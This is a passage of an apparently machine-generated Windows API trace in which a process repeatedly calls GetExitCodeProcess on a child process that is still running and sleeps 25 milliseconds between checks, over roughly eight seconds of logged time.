(dwMilliseconds=0x19) [0239.963] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.963] Sleep (dwMilliseconds=0x19) [0240.031] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.031] Sleep (dwMilliseconds=0x19) [0240.116] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.116] Sleep (dwMilliseconds=0x19) [0240.155] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.155] Sleep (dwMilliseconds=0x19) [0240.189] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.189] Sleep (dwMilliseconds=0x19) [0240.266] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.266] Sleep (dwMilliseconds=0x19) [0240.327] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.328] Sleep (dwMilliseconds=0x19) [0240.426] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.426] Sleep (dwMilliseconds=0x19) [0240.466] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.466] Sleep (dwMilliseconds=0x19) [0240.506] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.506] Sleep (dwMilliseconds=0x19) [0240.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.549] Sleep (dwMilliseconds=0x19) [0240.584] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.584] Sleep (dwMilliseconds=0x19) [0240.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.686] Sleep (dwMilliseconds=0x19) [0240.721] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.721] Sleep (dwMilliseconds=0x19) [0240.760] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.761] Sleep (dwMilliseconds=0x19) [0240.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.823] Sleep (dwMilliseconds=0x19) [0240.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.885] Sleep (dwMilliseconds=0x19) [0240.953] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.953] Sleep (dwMilliseconds=0x19) [0240.984] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0240.984] Sleep (dwMilliseconds=0x19) [0241.013] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.013] Sleep (dwMilliseconds=0x19) [0241.051] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.051] Sleep (dwMilliseconds=0x19) [0241.144] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.144] Sleep (dwMilliseconds=0x19) [0241.186] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.186] Sleep (dwMilliseconds=0x19) [0241.220] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.220] Sleep (dwMilliseconds=0x19) [0241.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.288] Sleep (dwMilliseconds=0x19) [0241.317] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.318] Sleep (dwMilliseconds=0x19) [0241.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.412] Sleep (dwMilliseconds=0x19) [0241.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.440] Sleep (dwMilliseconds=0x19) [0241.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.468] Sleep (dwMilliseconds=0x19) [0241.496] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.496] Sleep (dwMilliseconds=0x19) [0241.574] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.574] Sleep (dwMilliseconds=0x19) [0241.609] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.609] Sleep (dwMilliseconds=0x19) [0241.642] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.643] Sleep (dwMilliseconds=0x19) [0241.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.676] Sleep (dwMilliseconds=0x19) [0241.717] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.717] Sleep (dwMilliseconds=0x19) [0241.751] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.752] Sleep (dwMilliseconds=0x19) [0241.786] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.786] Sleep (dwMilliseconds=0x19) [0241.821] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.821] Sleep (dwMilliseconds=0x19) [0241.918] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.919] Sleep (dwMilliseconds=0x19) [0241.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.952] Sleep (dwMilliseconds=0x19) [0241.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0241.987] Sleep (dwMilliseconds=0x19) [0242.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.070] Sleep (dwMilliseconds=0x19) [0242.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.112] Sleep (dwMilliseconds=0x19) [0242.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.147] Sleep (dwMilliseconds=0x19) [0242.180] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.181] Sleep (dwMilliseconds=0x19) [0242.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.249] Sleep (dwMilliseconds=0x19) [0242.286] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.286] Sleep (dwMilliseconds=0x19) [0242.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.321] Sleep (dwMilliseconds=0x19) [0242.397] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.397] Sleep (dwMilliseconds=0x19) [0242.437] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.437] Sleep (dwMilliseconds=0x19) [0242.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.477] Sleep (dwMilliseconds=0x19) [0242.510] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.510] Sleep (dwMilliseconds=0x19) [0242.553] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.553] Sleep (dwMilliseconds=0x19) [0242.587] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.587] Sleep (dwMilliseconds=0x19) [0242.626] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.626] Sleep (dwMilliseconds=0x19) [0242.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.666] Sleep (dwMilliseconds=0x19) [0242.701] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.701] Sleep (dwMilliseconds=0x19) [0242.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.736] Sleep (dwMilliseconds=0x19) [0242.781] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.781] Sleep (dwMilliseconds=0x19) [0242.854] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.855] Sleep (dwMilliseconds=0x19) [0242.894] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.894] Sleep (dwMilliseconds=0x19) [0242.928] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.928] Sleep (dwMilliseconds=0x19) [0242.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0242.979] Sleep (dwMilliseconds=0x19) [0243.085] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.085] Sleep (dwMilliseconds=0x19) [0243.207] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.243] Sleep (dwMilliseconds=0x19) [0243.387] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.387] Sleep (dwMilliseconds=0x19) [0243.454] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.454] Sleep (dwMilliseconds=0x19) [0243.491] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.491] Sleep (dwMilliseconds=0x19) [0243.525] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.525] Sleep (dwMilliseconds=0x19) [0243.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.567] Sleep (dwMilliseconds=0x19) [0243.611] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.612] Sleep (dwMilliseconds=0x19) [0243.646] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.646] Sleep (dwMilliseconds=0x19) [0243.720] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.720] Sleep (dwMilliseconds=0x19) [0243.779] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.779] Sleep (dwMilliseconds=0x19) [0243.856] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.856] Sleep (dwMilliseconds=0x19) [0243.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.926] Sleep (dwMilliseconds=0x19) [0243.967] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0243.967] Sleep (dwMilliseconds=0x19) [0244.005] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.005] Sleep (dwMilliseconds=0x19) [0244.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.045] Sleep (dwMilliseconds=0x19) [0244.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.079] Sleep (dwMilliseconds=0x19) [0244.115] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.115] Sleep (dwMilliseconds=0x19) [0244.152] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.152] Sleep (dwMilliseconds=0x19) [0244.193] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.193] Sleep (dwMilliseconds=0x19) [0244.231] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.231] Sleep (dwMilliseconds=0x19) [0244.266] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.266] Sleep (dwMilliseconds=0x19) [0244.300] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.300] Sleep (dwMilliseconds=0x19) [0244.334] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.334] Sleep (dwMilliseconds=0x19) [0244.410] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.410] Sleep (dwMilliseconds=0x19) [0244.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.468] Sleep (dwMilliseconds=0x19) [0244.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.503] Sleep (dwMilliseconds=0x19) [0244.548] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.549] Sleep (dwMilliseconds=0x19) [0244.587] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.587] Sleep (dwMilliseconds=0x19) [0244.622] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.622] Sleep (dwMilliseconds=0x19) [0244.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.659] Sleep (dwMilliseconds=0x19) [0244.697] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.697] Sleep (dwMilliseconds=0x19) [0244.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.733] Sleep (dwMilliseconds=0x19) [0244.767] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.767] Sleep (dwMilliseconds=0x19) [0244.805] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.805] Sleep (dwMilliseconds=0x19) [0244.868] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.868] Sleep (dwMilliseconds=0x19) [0244.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.900] Sleep (dwMilliseconds=0x19) [0244.941] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.941] Sleep (dwMilliseconds=0x19) [0244.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0244.980] Sleep (dwMilliseconds=0x19) [0245.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.006] Sleep (dwMilliseconds=0x19) [0245.168] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.168] Sleep (dwMilliseconds=0x19) [0245.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.273] Sleep (dwMilliseconds=0x19) [0245.450] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.451] Sleep (dwMilliseconds=0x19) [0245.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.502] Sleep (dwMilliseconds=0x19) [0245.538] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.538] Sleep (dwMilliseconds=0x19) [0245.571] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.571] Sleep (dwMilliseconds=0x19) [0245.611] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.611] Sleep (dwMilliseconds=0x19) [0245.657] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.657] Sleep (dwMilliseconds=0x19) [0245.691] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.691] Sleep (dwMilliseconds=0x19) [0245.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.762] Sleep (dwMilliseconds=0x19) [0245.835] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.836] Sleep (dwMilliseconds=0x19) [0245.870] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.870] Sleep (dwMilliseconds=0x19) [0245.905] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.905] Sleep (dwMilliseconds=0x19) [0245.991] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0245.991] Sleep (dwMilliseconds=0x19) [0246.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.040] Sleep (dwMilliseconds=0x19) [0246.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.112] Sleep (dwMilliseconds=0x19) [0246.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.147] Sleep (dwMilliseconds=0x19) [0246.181] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.181] Sleep (dwMilliseconds=0x19) [0246.220] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.220] Sleep (dwMilliseconds=0x19) [0246.263] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.264] Sleep (dwMilliseconds=0x19) [0246.298] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.298] Sleep (dwMilliseconds=0x19) [0246.340] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.341] Sleep (dwMilliseconds=0x19) [0246.434] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.434] Sleep (dwMilliseconds=0x19) [0246.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.468] Sleep (dwMilliseconds=0x19) [0246.514] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.515] Sleep (dwMilliseconds=0x19) [0246.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.559] Sleep (dwMilliseconds=0x19) [0246.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.633] Sleep (dwMilliseconds=0x19) [0246.669] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.669] Sleep (dwMilliseconds=0x19) [0246.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.704] Sleep (dwMilliseconds=0x19) [0246.744] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.745] Sleep (dwMilliseconds=0x19) [0246.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.780] Sleep (dwMilliseconds=0x19) [0246.815] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.815] Sleep (dwMilliseconds=0x19) [0246.850] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.850] Sleep (dwMilliseconds=0x19) [0246.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.885] Sleep (dwMilliseconds=0x19) [0246.921] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.921] Sleep (dwMilliseconds=0x19) [0246.963] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0246.963] Sleep (dwMilliseconds=0x19) [0247.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.021] Sleep (dwMilliseconds=0x19) [0247.088] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.089] Sleep (dwMilliseconds=0x19) [0247.134] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.134] Sleep (dwMilliseconds=0x19) [0247.175] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.176] Sleep (dwMilliseconds=0x19) [0247.246] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.246] Sleep (dwMilliseconds=0x19) [0247.282] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.282] Sleep (dwMilliseconds=0x19) [0247.318] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.318] Sleep (dwMilliseconds=0x19) [0247.397] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.397] Sleep (dwMilliseconds=0x19) [0247.448] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.448] Sleep (dwMilliseconds=0x19) [0247.488] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.488] Sleep (dwMilliseconds=0x19) [0247.523] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.523] Sleep (dwMilliseconds=0x19) [0247.568] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.568] Sleep (dwMilliseconds=0x19) [0247.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.633] Sleep (dwMilliseconds=0x19) [0247.677] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.677] Sleep (dwMilliseconds=0x19) [0247.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.741] Sleep (dwMilliseconds=0x19) [0247.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.811] Sleep (dwMilliseconds=0x19) [0247.869] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.869] Sleep (dwMilliseconds=0x19) [0247.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0247.906] Sleep (dwMilliseconds=0x19) [0248.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.015] Sleep (dwMilliseconds=0x19) [0248.074] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.074] Sleep (dwMilliseconds=0x19) [0248.110] GetExitCodeProcess (in: hProcess=0x40c, 